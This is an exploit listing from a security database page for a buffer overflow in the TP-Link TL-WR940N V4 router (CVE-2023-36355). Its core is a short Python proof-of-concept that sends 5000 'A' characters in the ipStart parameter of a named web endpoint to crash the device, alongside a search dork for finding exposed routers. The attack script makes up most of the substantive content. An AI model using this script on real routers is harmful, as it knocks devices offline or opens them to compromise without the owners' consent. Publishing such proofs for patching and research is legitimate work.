TP-Link TL-WR940N 4 Buffer Overflow

2023.07.05
Risk: High
Local: No
Remote: Yes
CWE: CWE-119

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow # Date: 2023-06-30 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : hardware # Dork : /userRpm/WanDynamicIpV6CfgRpm # Tested on: Windows/Linux # CVE : CVE-2023-36355 import requests # Replace the IP address with the router's IP router_ip = '192.168.0.1' # Construct the URL with the vulnerable endpoint and parameter url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart=' # Replace the payload with a crafted payload that triggers the buffer overflow payload = 'A' * 5000 # Example payload, adjust the length as needed # Send the GET request with the crafted payload response = requests.get(url + payload) # Check the response status code if response.status_code == 200: print('Buffer overflow triggered successfully') else: print('Buffer overflow not triggered')


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top